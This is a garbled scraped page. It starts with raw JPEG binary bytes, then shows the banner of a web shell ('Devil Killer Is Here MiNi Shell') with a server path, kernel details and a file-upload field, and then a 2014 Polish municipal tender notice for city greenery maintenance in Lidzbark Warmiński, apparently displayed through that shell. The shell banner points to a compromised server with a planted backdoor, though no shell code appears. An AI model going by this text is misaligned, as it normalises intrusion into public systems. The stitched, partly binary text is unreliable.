JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140221/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140221/62220-N-2014.html

<p class="kh_header"><b>Lidzbark Warmiński: Utrzymanie zieleni miejskiej w Lidzbarku Warmińskim</b><br>
<b>Numer ogłoszenia: 62220 - 2014; data zamieszczenia: 21.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Lidzbark Warmiński , ul. A. Świętochowskiego 14, 11-100 Lidzbark Warmiński, woj. warmińsko-mazurskie, tel. 089 7678500, faks 089 7672303.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://lidzbarkw-um.bip-wm.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Utrzymanie zieleni miejskiej w Lidzbarku Warmińskim.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest: Utrzymanie zieleni miejskiej w Lidzbarku Warmińskim,                  
    z podziałem na trzy następujące zadania:

  1.1 Zadanie nr 1 - Pielęgnacja terenów zieleni miejskiej, w zakres którego wchodzą:
      1) Systematyczne koszenie trawników i skarp,
      2) Grabienie trawników - wiosenne i jesienne, 
      3) Zakładanie trawników z siewu, 
      4) Zakładanie trawników z rolki, 
      5) Pielęgnacja żywopłotów, 
      6) Całoroczna pielęgnacja krzewów. 

1.2 Zadanie nr 2 - Dostawy, sadzenie i pielęgnacja roślin ozdobnych, w zakres 
      którego wchodzą:
      1) Dostawa, sadzenie i pielęgnacja kwiatów (jednorocznych i wieloletnich), 
      2) Dostawa, sadzenie i pielęgnacja krzewów ozdobnych,
      3) Przesadzanie roślin wieloletnich wraz z ich pielęgnacją po przesadzeniu do 
          końca okresu wegetacyjnego (krzewów, róż),
      4) Przygotowanie gruntu pod nasadzenia krzewów ozdobnych,
      5) Ściółkowanie terenu korą sosnową, 
      6) Wykonanie drewnianego zabezpieczenia przy nasadzeniach wieloletnich (krzewach, 
          bylinach itp.) i jego konserwacja,
      7) Montaż konstrukcji wiszących, 
      8) Całosezonowa pielęgnacja roślin w wiszących konstrukcjach kwiatowych 
          zamontowanych na słupach oświetleniowych, będących w posiadaniu Zamawiającego 
          oraz demontaż ww. konstrukcji po zakończeniu okresu wegetacyjnego,
      9) Przygotowanie do nowego okresu wegetacyjnego wież kwiatowych,
      10) Pielęgnacja kwiatów (róż, bylin, roślin cebulowych).

 1.3 Zadanie nr 3  - Dostawa i montaż wiszących donic i konstrukcji kwiatowych  
       wraz z ich ukwieceniem, w zakres którego wchodzą:
       1) Dostawa 30 kompletów wiszących donic kwiatowych wraz z ich ukwieceniem oraz 
           montaż ww. donic na słupach oświetleniowych,
       2) Dostawa 7 kompletów wiszących kaskadowych konstrukcji kwiatowych wraz z ich 
           ukwieceniem oraz montaż ww. konstrukcji na słupach oświetleniowych.
2. Zakres przedmiotu zamówienia obejmuje również niezwłoczne usuwanie odpadów 
    powstałych w związku z wykonywaniem usług i dostaw wyszczególnionych w ust. 1 
    własnym staraniem i na własny koszt na miejsce prawem dopuszczone.
3. Szczegółowe zasady realizacji i rozliczenia przedmiotu zamówienia opisują wzory umów, 
    stanowiące załączniki do niniejszej specyfikacji istotnych warunków zamówienia.</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 77.30.00.00-3, 03.12.11.00-6, 77.31.00.00-6, 77.31.30.00-7, 77.31.41.00-5, 77.34.20.00-9, 39.29.83.00-0.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Wykonawca przystępując do przetargu ma obowiązek wnieść wadium  w wysokości:    
    1) 2 000,00 złotych (słownie: dwa tysiące złotych) - w przypadku składania oferty
         na zadanie nr 1,
    2) 1 500,00 złotych (słownie: jeden tysiąc pięćset złotych) - w przypadku składania oferty 
        na zadanie nr 2,  
   3) 1 000,00 złotych (słownie: jeden tysiąc złotych) - w przypadku składania oferty 
        na zadanie nr 3,  
     na cały okres związania ofertą, który wynosi 30 dni. Bieg terminu związania ofertą 
     rozpoczyna się wraz z upływem terminu składania ofert (do tego terminu wlicza się 
     również dzień, w którym nastąpiło złożenie ofert).
2. Wadium w wymaganej przez Zamawiającego wysokości należy wnieść przed upływem 
    terminu składania ofert. 
3. Wadium może być wniesione w następujących formach:
1)	w pieniądzu;
2)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	gwarancjach bankowych, 
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 r. Nr 42, poz. 275 z późń. zm.).
4. Miejsce i sposób wniesienia wadium.
a) Wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy -   Urzędu  
    Miejskiego Lidzbarka Warmińskiego w Banku Millennium S.A. Nr   
   13116022020000000061931481, z dopiskiem: Utrzymanie zielni miejskiej - Zadanie:   
    .................................................................................... 
   (wymienić Nr oferowanego/oferowanych zadania/zadań)
    Oferta jest skutecznie zabezpieczona wadium, jeśli pieniądze znajdą się na ww. 
    rachunku  przed terminem składania ofert. Kopię potwierdzenia wniesienia wadium 
    poświadczoną za zgodność z oryginałem należy dołączyć do oferty.
 b) W przypadku wnoszenia wadium w pozostałych dopuszczalnych formach, kopię 
     dokumentu poświadczoną za zgodność z oryginałem należy dołączyć do oferty. 
     Ponadto do oferty należy dołączyć, w osobnej koszulce, oryginał tego dokumentu. Nie 
     bindować i nie zszywać z ofertą. 
5. W przypadku składania przez Wykonawcę wadium w formie gwarancji lub poręczenia, 
    dokument powinien być sporządzony zgodnie z obowiązującym prawem i winien zawierać 
    następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji lub poręczenia (Zamawiającego), gwaranta lub poręczyciela (instytucji udzielających gwarancji lub poręczenia) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją lub poręczeniem,
c)	kwotę gwarancji lub poręczenia,
d)	termin ważności gwarancji lub poręczenia,
e)	zobowiązanie gwaranta lub poręczyciela do zapłacenia kwoty gwarancji lub poręczenia na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano:
- odmówił podpisania umowy na warunkach określonych w ofercie, lub
- zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy, 
f)	zobowiązanie gwaranta lub poręczyciela do: zapłacenia kwoty gwarancji lub poręczenia jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, nie złożył dokumentów lub oświadczeń o których mowa w art. 25 ust. 1 ustawy Prawo zamówień publicznych lub pełnomocnictw, chyba że udowodni, iż wynika to z przyczyn nie leżących po jego stronie, 
g)	gwarancja lub poręczenie winno być nieodwołalne i bezwarunkowe. Gwarancja lub poręczenie winny przewidywać termin bezwarunkowej wypłaty maksymalnie do 21 dni od pierwszego pisemnego żądania wypłaty wadium,
h)	wszelkie spory dotyczące gwarancji lub poręczenia podlegają rozstrzygnięciu zgodnie z prawem Rzeczpospolitej Polskiej i podlegają kompetencji sądu właściwego dla siedziby Zamawiającego.
i)	jednocześnie Zamawiający wymaga, aby okres ważności gwarancji lub poręczenia nie był krótszy niż okres związania ofertą.
j)	w przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się            o udzielenie niniejszego zamówienia Zamawiający uzna wadium za wniesione skutecznie, o ile odpowiadać będzie postanowieniom niniejszej specyfikacji istotnych warunków zamówienia oraz wniesione zostało przez jednego                          z wykonawców wspólnie ubiegających się o udzielenie zamówienia w wymaganej wysokości i wymaganym terminie.
6. Wykonawca, który nie wniesie wadium na zasadach określonych w Specyfikacji 
    Istotnych Warunków Zamówienia zostanie wykluczony z postępowania zgodnie 
    z art. 24 ust. 2 pkt 2 ustawy - Prawo zamówień publicznych. 
7.  Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta 
     została wybrana: 
-	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie; 
-	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy. 
8. Zamawiający zatrzymuje również wadium wraz z odsetkami w przypadku określonym
    w art. 46 ust. 4a ustawy Pzp.
9. Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty    
    najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego 
    oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem art. 46 ust. 4a ustawy Pzp. 
10. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, Zamawiający zwraca 
    wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
11. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę 
    przed upływem terminu składania ofert.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie opisuje szczegółowo sposobu dokonywania oceny spełnienia ww.  
      warunku udziału w postępowaniu.
      Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca złoży 
      oświadczenie o spełnieniu warunków udziału w postępowaniu określonych w art. 22 ust.  
      1 ustawy Pzp.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) W przypadku oferty złożonej na wykonanie zadania nr 1, Zamawiający uzna, że 
           Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że w okresie 
           ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
           prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej  jedną 
           usługę pielęgnacji terenów zieleni miejskiej, o wartości nie mniejszej niż 80 000,00 
           zł brutto (słownie: osiemdziesiąt tysięcy złotych brutto) oraz załączy dowody czy 
            usługi te zostały wykonane należycie.
       2) W przypadku oferty złożonej na wykonanie zadania nr 2, Zamawiający uzna, że 
           Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że w okresie 
           ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
           prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną 
           usługę obejmującą swoim zakresem dostawy, sadzenie i pielęgnację roślin 
           ozdobnych, o wartości nie mniejszej niż 60 000,00 zł brutto (słownie: sześćdziesiąt 
           tysięcy złotych brutto) oraz załączy dowody czy usługi te zostały wykonane należycie.
       3) W przypadku oferty złożonej na wykonanie zadania nr 3, Zamawiający uzna, że 
           Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że w okresie 
           ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres 
           prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej jedną 
           dostawę obejmującą swoim zakresem dostawę i montaż wiszących donic oraz 
           wiszących konstrukcji kwiatowych wraz z ich ukwieceniem lub  dostawę i montaż 
           wiszących donic  wraz z ich ukwieceniem lub dostawę i montaż wiszących konstrukcji 
           kwiatowych wraz z ich ukwieceniem, o wartości nie mniejszej niż 40 000,00 zł 
           brutto (słownie: czterdzieści tysięcy złotych brutto) oraz załączy dowody czy 
          dostawy te zostały wykonane należycie.
           Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
           wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1)  W przypadku oferty złożonej na wykonanie zadania nr 1, Zamawiający uzna, że 
               Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że dysponuje co 
               najmniej następującymi narzędziami  i urządzeniami: 
		- kosiarka rotacyjna - 1 szt., 
		- kosiarka spalinowa - 3 szt., 
                    - kosiarka samojezdna - 1 szt.,
		- kosy spalinowe - 3 szt.,  
		- żywopłociarka - 1 szt., 
		- piła spalinowa  - 1 szt., 
                    - glebogryzarka - 1 szt.,
		- inne drobne narzędzia do prac ogrodniczych.
         2) W przypadku oferty złożonej na wykonanie zadania nr 2, Zamawiający uzna, że 
             Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że dysponuje  
             następującymi narzędziami i urządzeniami: 
		- beczkowóz - 1 szt., 
                     - ciągnik - 1szt., 
		- inne drobne narzędzia do prac ogrodniczych.
Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
	wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku oferty złożonej na wykonanie zadania nr 1 lub zadania nr 2, 
              Zamawiający uzna,  że Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca 
              wykaże, że dysponuje co najmniej jedną osobą, która będzie uczestniczyć                         
              w wykonaniu zamówienia, posiadającą wykształcenie wyższe  o kierunku  lub 
              specjalności architektura krajobrazu lub ogrodnictwo oraz  co najmniej 2 letnie 
              doświadczenie zawodowe. 
	Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
	wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1) W przypadku oferty złożonej na  wykonanie zadania nr 1, Zamawiający uzna, że 
               Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że jest 
               ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
                związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż  
     80 000,00 zł (słownie: osiemdziesiąt tysięcy złotych).
            2) W przypadku oferty złożonej na wykonanie zadania nr 2, Zamawiający uzna, że 
                Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że jest 
 	      ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
                związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż  
     60 000,00 zł (słownie: sześćdziesiąt tysięcy złotych).
           3) W przypadku oferty złożonej na wykonanie zadania nr 3, Zamawiający uzna, że 
     Wykonawca spełnia niniejszy warunek, jeżeli Wykonawca wykaże, że jest
     ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności 
     związanej z przedmiotem niniejszego zamówienia, na kwotę nie niższą niż  
    40 000,00 zł (słownie: czterdzieści tysięcy złotych).
          4) W przypadku oferty złożonej na wykonanie zadania nr 1 i zadania nr 2 oraz 
               zadania nr 3 Zamawiający uzna, że Wykonawca spełnia niniejszy warunek, jeżeli 
    Wykonawca wykaże, że jest ubezpieczony od odpowiedzialności cywilnej                           
    w zakresie prowadzonej działalności związanej z przedmiotem niniejszego  
    zamówienia, na kwotę nie niższą niż  180 000,00 zł (słownie: sto osiemdziesiąt 
    tysięcy złotych).
            Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą    
	  wykazać, że łącznie spełniają powyższy warunek.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Wypełniony Formularz oferty, sporządzony według wzoru stanowiącego  załącznik nr 1 do SIWZ,
2. Stosowne Pełnomocnictwo(a) - w przypadku, gdy upoważnienie do podpisania oferty 
     nie wynika bezpośrednio z dokumentów załączonych do oferty. W przypadku 	Wykonawców wspólnie ubiegających się o udzielenie zamówienia, dokument 	ustanawiający Pełnomocnika do reprezentowania ich w postępowaniu o udzielenie 	zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie 	niniejszego zamówienia publicznego,
3. Kopię dowodu wniesienia wadium.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
